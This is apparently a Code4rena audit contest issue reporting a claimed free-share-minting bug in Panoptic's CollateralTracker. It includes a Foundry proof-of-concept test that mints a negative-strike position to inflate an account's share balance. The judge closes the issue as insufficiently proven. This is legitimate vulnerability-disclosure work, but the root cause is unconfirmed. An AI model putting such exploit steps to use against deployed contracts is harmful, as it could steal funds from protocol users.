code-423n4 / 2024-04-panoptic-findings

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User can mint free shares by opening positions in the pool #518

Closed c4-bot-6 closed 4 months ago

c4-bot-6 commented 4 months ago

Lines of code

Vulnerability details


An attacker can mint large amount of shares in the CollateralTracker with no deposit simply by placing a carefully constructed position.

Proof of Concept

Unfortunately, I didn't have much time to research this exploit in depth, there may be other ways to reproduce it, and it's exact nature is unknown to me. I'll just leave steps to reproduce this bug and some of my speculations on it's origin below.

We start with a clear pool, totalSupply = 10e6, totalAssets = 1, the forge test is PanopticPool.t.sol:

    function test_FreeMint(
    ) public {
        uint256 x = 111;

        // It seems like a negative strike value causes the bug, the lower the strike the number of shares minted
        TokenId tokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(0,1,1,0,0,0,-300000,5760000);

        TokenId[] memory posIdList = new TokenId[](1);
        posIdList[0] = tokenId;

        console.log("\nSTART MINT\n");

        console.log("SHARES BEFORE: ", ct0.balanceOf(Alice));
        // Attacker sends tokens directly to the PP
        deal(token0, address(pp), 100000);
        deal(token1, address(pp), 100000);

        // Deposit in CT1 so we are solvent
        ct1.deposit(100e18, Alice);

        // Mint a position in PP
        pp.mintOptions(posIdList, 100000, 0, 0, 0);
        console.log("SHARES AFTER: ", ct0.balanceOf(Alice));

In the following test, Alice starts with 0 shares, donates 100000 underlying tokens to the PP and mints a position, after this her balance is 1065765340334735623000000.

Some logs: On position mint the pool calls collateral tracker takeCommissionAddData function with following parameters: shortAmount is received from PanopticMath.getAmountsMoved:

State of the collateral tracker after attack s_poolAssets = 340282366920938463463374607431768125538 s_inAMM = 1067045795289168526 totalAssets = 1067045795289082608

Tools Used


Recommended Mitigation Steps


Assessed type


c4-judge commented 4 months ago

Picodes marked the issue as unsatisfactory: Insufficient proof

Picodes commented 4 months ago

I cannot accept this report due the fact that it doesn't precisely isolate a bug or a root cause